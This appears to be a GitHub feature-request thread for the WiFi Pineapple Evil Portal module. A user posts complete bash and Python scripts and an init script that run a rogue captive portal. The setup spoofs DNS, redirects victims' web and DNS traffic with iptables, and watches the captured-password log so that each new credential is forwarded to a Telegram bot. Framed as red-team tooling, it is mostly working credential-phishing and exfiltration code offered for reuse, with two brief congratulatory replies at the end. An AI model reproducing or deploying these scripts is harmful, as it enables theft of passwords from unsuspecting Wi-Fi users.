[Evil Portal] Feature Request: notify-ng

[vay3t]

Short story: Send captured credentials to telegram bot

A couple of years ago I made a bash script that helped me do a hot read of a file and every time that file was updated it sent a message from the telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610)

With that idea I molded it to use it in the wifi pineapple and in this way have telegram notifications for red team campaigns.

/root/notify.sh

#!/bin/bash

function urlencode() {
        # urlencode <string>
        old_lc_collate=$LC_COLLATE
        LC_COLLATE=C
        local length="${#1}"
        for (( i = 0; i < length; i++ )); do
                local c="${1:$i:1}"
                case $c in
                        [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
                        *) printf '%%%02X' "'$c" ;;
                esac
        done
        LC_COLLATE=$old_lc_collate
}

token="TOKENOFBOT"
id="IDUSER"

if [ "$1" != "" ]; then
        if [ ! -t 0 ]; then
                msj="$(cat $1)"
        fi
else
        msj="beep"
fi

msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
        echo "Error with bot"
fi

/root/hotreader.sh

#!/bin/bash

file="/www/.logs"
lines=$(cat $file | wc -l)
###while inotifywait -q -e modify $file; do
inotifywait -q -m -e modify $file | while read filename event; do
        linesNow=$(cat $file | wc -l)
        tail -n $(($linesNow-$lines)) $file > /tmp/out.out && bash /root/notify.sh /tmp/out.out
        lines=$linesNow
done

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    bash /root/hotreader.sh &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}

disable() {
    rm /etc/rc.d/*evilportal
    kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}

I would like to work more but I'm not very good at developing web applications

Notes:

• The log file of the captured passwords should be blocked with an htaccess or any type of protection to the public from the web.
• It is possible that my solution is vulnerable to RCE due to the nature of Bash, but I think that using Python would be a good alternative

[vay3t]

Python solution

req.txt

opkg install python3-pyinotify

/root/notify.py

import urllib.request
import urllib.parse
import sys
import pyinotify
import os.path

global lines

file_watcher = os.path.realpath("/www/.logs")

def count_lines(file_name):
    with open(file_name) as f:
        count = len(f.readlines())
    return count

def tail_n(file_name, n):
    with open(file_name) as f:
        lines = f.readlines()
    return lines[-n:]

def list2string(list):
    return "".join(list)

def sender(msj):
    if msj == "":
        msj = "[EvilPortal]"

    token = "<TOKEN>"
    chat_id = "<CHAT_ID>"

    url = f"https://api.telegram.org/bot{token}/sendMessage"

    values = {
        "chat_id": chat_id,
        "text": msj
    }

    data = urllib.parse.urlencode(values)
    data = data.encode('ascii')
    req = urllib.request.Request(url, data)
    urllib.request.urlopen(req)


# Example: monitors transient files.
#
# Run this code, then run transient_file.sh in another shell.


class ProcessTransientFile(pyinotify.ProcessEvent):

    def process_IN_MODIFY(self, event):
        global lines
        # We have explicitely registered for this kind of event.
        #print('\t', event.pathname, ' -> written')
        lines_now = count_lines(file_watcher)
        modified = tail_n(file_watcher, lines_now - lines)
        print(list2string(modified))
        lines = lines_now
        sender(list2string(modified))


    def process_default(self, event):
        # Implicitely IN_CREATE and IN_DELETE are watched too. You can
        # ignore them and provide an empty process_default or you can
        # process them, either with process_default or their dedicated
        # method (process_IN_CREATE, process_IN_DELETE) which would
        # override process_default.
        print('default: ', event.maskname)


lines = count_lines(file_watcher)

wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm)
# In this case you must give the class object (ProcessTransientFile)
# as last parameter not a class instance.
wm.watch_transient_file(file_watcher, pyinotify.IN_MODIFY, ProcessTransientFile)
notifier.loop()

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    python3 /root/notify.py &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    kill $(ps aux | grep notify.py | head -2 | awk '{print $2}')
}

disable() {
    rm /etc/rc.d/*evilportal
}

[EduardoDesdes]

weeeeeeeeena bayeton xuxetumare!!!

[gvillegass]

buena manito